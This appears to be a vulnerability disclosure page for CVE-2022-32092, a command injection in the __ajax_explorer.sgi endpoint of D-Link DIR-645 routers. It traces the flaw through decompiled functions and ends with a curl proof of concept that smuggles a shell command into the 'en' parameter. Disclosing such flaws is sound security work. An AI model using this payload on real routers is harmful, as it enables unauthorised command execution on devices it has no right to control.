Skip to content

Latest commit

 

History

History

DIR-645

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Vendor of the products:D-Link

Reported by:    WangJincheng(wjcwinmt@outlook.com) && FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

Affected products:D-Link DIR-645 <= v1.03

Vendor Homepage: https://www.dlink.com/en/consumer

Vendor Advisory: https://tsd.dlink.com.tw/ddgo

CVE_ID:CVE-2022-32092

summarize

D-Link DIR-645 was discovered to contain a command injection vulnerability when operate the file __ajax_explorer.sgi. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Vulnerability description

We can see that the os will get QUERY_STRING in scandir_main, and pass it to sub_410AD4

image-20220316191407126

In sub_410AD4, it calls sub_410434

image-20220316191407126

In sub_410434, it contains a command injection.

image-20220316191407126

before the attack

image-20220316191407126

after the attack

image-20220316191407126

poc

curl "http://192.168.0.1/portal/__ajax_explorer.sgi?action=umnt&path=path&where=here&en=;echo%20X1cT34mpwner%20>FXC;"